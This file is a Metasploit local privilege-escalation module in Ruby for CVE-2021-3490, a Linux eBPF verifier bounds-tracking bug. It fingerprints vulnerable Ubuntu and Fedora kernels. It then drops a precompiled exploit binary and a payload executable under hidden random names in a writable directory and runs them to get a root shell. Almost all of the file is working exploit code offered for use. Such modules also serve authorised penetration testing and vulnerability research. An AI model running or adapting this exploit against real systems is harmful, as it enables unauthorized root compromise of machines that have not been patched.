##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = GreatRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Kernel
  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Linux eBPF ALU32 32-bit Invalid Bounds Tracking LPE',
        'Description' => %q{
          Linux kernels from 5.7-rc1 prior to 5.13-rc4, 5.12.4, 5.11.21, and
          5.10.37 are vulnerable to a bug in the eBPF verifier's verification
          of ALU32 operations in the scalar32_min_max_and function when performing
          AND operations, whereby under certain conditions the bounds of a
          32 bit register would not be properly updated.

          This can be abused by attackers to conduct an out of bounds read
          and write in the Linux kernel and therefore achieve arbitrary
          code execution as the root user.

          The target system must be compiled with eBPF support and not have
          kernel.unprivileged_bpf_disabled set, which prevents unprivileged
          users from loading eBPF programs into the kernel. Note that if
          kernel.unprivileged_bpf_disabled is enabled this module can still be
          utilized to bypass protections such as SELinux, however the user
          must already be logged as a privileged user such as root.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Manfred Paul', # Aka @_manfp, original vulnerability discovery
          'chompie1337', # Exploit writeup and PoC
          'Grant Willcox' # Aka @tekwizz123, Metasploit Module
        ],
        'DisclosureDate' => '2021-05-11',
        'Platform' => [ 'linux' ],
        'Arch' => [ ARCH_X86, ARCH_X64 ],
        'SessionTypes' => [ 'shell', 'meterpreter' ],
        'Targets' => [[ 'Auto', {} ]],
        'Privileged' => true,
        'References' => [
          [ 'CVE', '2021-3490' ],
          [ 'URL', 'https://www.openwall.com/lists/oss-security/2021/05/11/11' ],
          [ 'URL', 'https://github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490' ], # Original PoC
          [ 'URL', 'https://www.zerodayinitiative.com/blog/2020/4/8/cve-2020-8835-linux-kernel-privilege-escalation-via-improper-ebpf-program-verification' ], # Discussess the techniques used to gain arbitrary R/W in kernel.
          [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf.git/commit/?id=049c4e13714ecbca567b4d5f6d563f05d431c80e' ],
          [ 'URL', 'https://www.graplsecurity.com/post/kernel-pwning-with-ebpf-a-love-story' ],
          [ 'URL', 'https://www.zerodayinitiative.com/advisories/ZDI-21-606/' ],
          [ 'URL', 'https://ubuntu.com/security/notices/USN-4950-1' ],
          [ 'URL', 'https://ubuntu.com/security/notices/USN-4949-1' ]
        ],
        'Notes' => {
          'Reliability' => [ REPEATABLE_SESSION ],
          'Stability' => [ CRASH_OS_DOWN ],
          'SideEffects' => [ ]
        },
        'DefaultTarget' => 0
      )
    )
    register_options([
      OptInt.new('CmdTimeout', [true, 'Maximum number of seconds to wait for the exploit to complete', 120])
    ])
    register_advanced_options([
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
    ])
  end

  def base_dir
    datastore['WritableDir'].to_s
  end

  def check
    arch = kernel_hardware

    # Could we potentially support x86? Yes, potentially. Will we? Well considering the 5.7 kernel was released
    # in 2020 and official support for x64 kernels ended in 2012 with
    # https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=743aa456c1834f76982af44e8b71d1a0b2a82e2
    # combined with the fact that those distros that do have older x86 versions mostly have 4.x or older kernels,
    # and 90% of them have dropped support for x86 kernels a while back, we'll just assume that if its x86, its probably not
    # running an affected Linux kernel.
    unless arch.include?('x86_64')
      return CheckCode::Safe("System architecture #{arch} is not supported")
    end

    if unprivileged_bpf_disabled?
      return CheckCode::Safe('Unprivileged BPF loading is not permitted')
    end

    vprint_good('Unprivileged BPF loading is permitted')

    release = kernel_release
    version = kernel_version

    # If the target is Ubuntu...
    if version =~ /[uU]buntu/
      version_array = release.split('-')
      if version_array.length < 2
        fail_with(Failure::UnexpectedReply, 'The target Ubuntu server does not have the expected kernel version format!')
      end
      major_version = version_array[0]
      minor_version = version_array[1]

      # First check if we are past the 5.11.x kernel releases and into at the time of
      # writing beta versions of Ubuntu. If so,the target isn't vuln.
      if Rex::Version.new(major_version) >= Rex::Version.new('5.12.0')
        return CheckCode::Safe("Target Ubuntu kernel version is #{major_version}-#{minor_version} which is not vulnerable!")
      elsif (Rex::Version.new(major_version) == Rex::Version.new('5.11.0')) && (Rex::Version.new(minor_version) >= Rex::Version.new('17.18'))
        return CheckCode::Safe('Target Ubuntu kernel version is running a 5.11.x build however it has updated to a patched version!')
      elsif (Rex::Version.new(major_version) == Rex::Version.new('5.8.0')) && (Rex::Version.new(minor_version) >= Rex::Version.new('53.60'))
        return CheckCode::Safe('Target Ubuntu kernel version is running a 5.8.x build however it has updated to a patched version!')
      elsif (Rex::Version.new(major_version) != Rex::Version.new('5.8.0')) && (Rex::Version.new(major_version) != Rex::Version.new('5.11.0')) # Only Ubuntu 20.04.02, Groovy, and Hirsuite are affected, other releases used a kernel either too old or which was patched.
        return CheckCode::Unknown('Unknown target kernel version, recommend manually checking if target kernel is vulnerable.')
      end
    elsif release =~ /\.fc3[2,3,4]\./
      version_array = release.split('-')
      if version_array.length < 2
        fail_with(Failure::UnexpectedReply, 'The target Fedora server does not have the expected kernel version format!')
      end
      major_version = version_array[0]
      if version_array[1].split('.').length != 3
        fail_with(Failure::UnexpectedReply, 'The target Fedora server does not have the expected minor kernel version format!')
      end
      minor_version = version_array[1].split('.')[0]
      if Rex::Version.new(major_version) >= Rex::Version.new('5.11.20')
        return CheckCode::Safe("Target Fedora kernel version is #{major_version}-#{minor_version} which is not vulnerable!")
      elsif Rex::Version.new(major_version) == Rex::Version.new('5.11.20') && Rex::Version.new(minor_version) >= Rex::Version.new('300')
        return CheckCode::Safe('Target Fedora system is running a 5.11.20 kernel however it has been patched!')
      elsif Rex::Version.new(major_version) <= Rex::Version.new('5.7')
        return CheckCode::Safe('Running a Fedora system with a kernel before kernel version 5.7 where the vulnerability was introduced')
      end
    else
      return CheckCode::Unknown("Target is not a known target, so we can't check if the target is vulnerable or not!")
    end

    vprint_good("Kernel version #{release} appears to be vulnerable")

    config = kernel_config

    if config.nil?
      return CheckCode::Detected('Could not retrieve kernel config')
    end

    unless config.include?('CONFIG_BPF_SYSCALL=y')
      return CheckCode::Safe('Kernel config does not include CONFIG_BPF_SYSCALL')
    end

    vprint_good('Kernel config has CONFIG_BPF_SYSCALL enabled')

    CheckCode::Appears
  end

  def exploit
    if is_root? && !datastore['ForceExploit']
      fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
    end

    unless writable?(base_dir)
      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
    end

    executable_name = ".#{rand_text_alphanumeric(5..10)}"
    executable_path = "#{base_dir}/#{executable_name}"
    vprint_status('Dropping pre-compiled exploit on system...')
    release = kernel_release
    if release.split('-').length < 2
      fail_with(Failure::UnexpectedReply, 'The target server does not have the expected kernel version format!')
    end
    major_version = release.split('-')[0]
    if (Rex::Version.new(major_version) == Rex::Version.new('5.11.0')) && kernel_version =~ /[uU]buntu/
      upload_and_chmodx(executable_path, exploit_data('cve-2021-3490', 'hirsute.bin'))
    elsif (Rex::Version.new(major_version) == Rex::Version.new('5.8.0')) && kernel_version =~ /[uU]buntu/
      upload_and_chmodx(executable_path, exploit_data('cve-2021-3490', 'groovy.bin'))
    elsif release =~ /\.fc3[2,3,4]\./ && major_version =~ /5\.7/
      upload_and_chmodx(executable_path, exploit_data('cve-2021-3490', 'fedora-5-7.bin'))
    elsif release =~ /\.fc3[2,3,4]\./ && major_version =~ /5\.8/
      upload_and_chmodx(executable_path, exploit_data('cve-2021-3490', 'fedora-5-8.bin'))
    elsif release =~ /\.fc3[2,3,4]\./ && major_version =~ /5\.9/
      upload_and_chmodx(executable_path, exploit_data('cve-2021-3490', 'fedora-5-9.bin'))
    elsif release =~ /\.fc3[2,3,4]\./ && major_version =~ /5\.10/
      upload_and_chmodx(executable_path, exploit_data('cve-2021-3490', 'fedora-5-10.bin'))
    elsif release =~ /\.fc3[2,3,4]\./ && major_version =~ /5\.11/
      upload_and_chmodx(executable_path, exploit_data('cve-2021-3490', 'fedora-5-11.bin'))
    else
      fail_with(Failure::NoTarget, 'The target OS cannot be targeted by this exploit. Considering submitting a PR to add support for this target!')
    end
    register_file_for_cleanup(executable_path)

    # Upload payload executable
    payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
    upload_and_chmodx(payload_path, generate_payload_exe)
    register_file_for_cleanup(payload_path)

    # Launch exploit
    print_status('Launching exploit...')
    print_warning('Note that things may appear to hang due to the exploit not exiting.')
    print_warning("Feel free to press CTRL+C if the shell is returned before #{datastore['CmdTimeout']} seconds are up.")
    response = cmd_exec(executable_path.to_s, payload_path.to_s, datastore['CmdTimeout'])
    if response =~ /fail/
      fail_with(Failure::NoTarget, 'The exploit failed! Check to see if you are running this against the right target and kernel version!')
      vprint_error("The response was: #{response}")
    elsif response =~ /success!/
      print_good('Exploit completed successfully, shell should be returning soon!')
    else
      print_status('No indication of exploit success or failure, try increasing CmdTimeout value!')
    end
  end
end
